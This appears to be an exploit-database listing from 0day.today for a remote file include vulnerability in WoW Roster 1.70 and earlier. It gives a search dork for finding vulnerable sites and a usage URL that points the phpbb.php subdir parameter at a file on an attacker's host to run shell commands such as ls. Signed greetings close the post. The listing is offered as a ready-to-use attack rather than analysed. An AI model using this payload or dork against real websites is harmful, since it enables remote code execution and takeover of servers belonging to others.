[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include Vulnerability

Author
|peti
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-633
Category
web applications
Date add
01-08-2006
Platform
unsorted
=====================================================================
WoW Roster <= 1.70 (/lib/phpbb.php) Remote File Include Vulnerability
=====================================================================



--------------------------------------------------------------------------------

Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability

--------------------------------------------------------------------------------

Affected software description :

Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/

--------------------------------------------------------------------------------

dork        : "wow roster version 1.*"
Exploit     :

--------------------------------------------------------------------------------

Usage:

http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls

--------------------------------------------------------------------------------

greets:

XLR, rdy, wiggle, phreek, menx [...]

special greet: my old gf ;)

--------------------------------------------------------------------------------

Contact:

Nick: |peti on irc.quakenet.org/irc.efnet.net

--------------------------------- [ eof ] --------------------------------------



#  0day.today [2024-11-15]  #